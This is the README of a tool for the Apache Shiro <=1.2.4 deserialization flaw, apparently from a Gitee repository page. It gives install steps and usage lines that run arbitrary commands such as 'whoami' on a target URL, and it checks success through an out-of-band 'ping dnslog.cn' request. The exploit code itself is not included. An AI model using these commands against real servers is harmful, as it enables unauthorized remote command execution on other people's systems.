代码拉取完成,页面将自动刷新
Shiro<=1.2.4反序列化,一键检测工具
如果有帮助,请点个star哦,blog:svenbeast.com
pip3 install -r requirments.txt
Usage:python check_shiro.py //批量检测是否使用了shiro组件
Usage:python3 shiro.py url command
Usage:python3 shiro.py http://url.com whoami
http://www.dnslog.cn/ 验证推荐使用这个dnslog平台,速度比ceye.io要快很多
执行的命令带空格记得用""引起来
usage:python3 shiro.py http://url.com "ping dnslog.cn"
7个模块全部跑一遍,然后去dnslog平台查看是否收到请求,不出来就GG,也可能是因为编码还不够多
请自行收集编码,在moule下的源代码中自行添加方法即可
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
马建仓 AI 助手
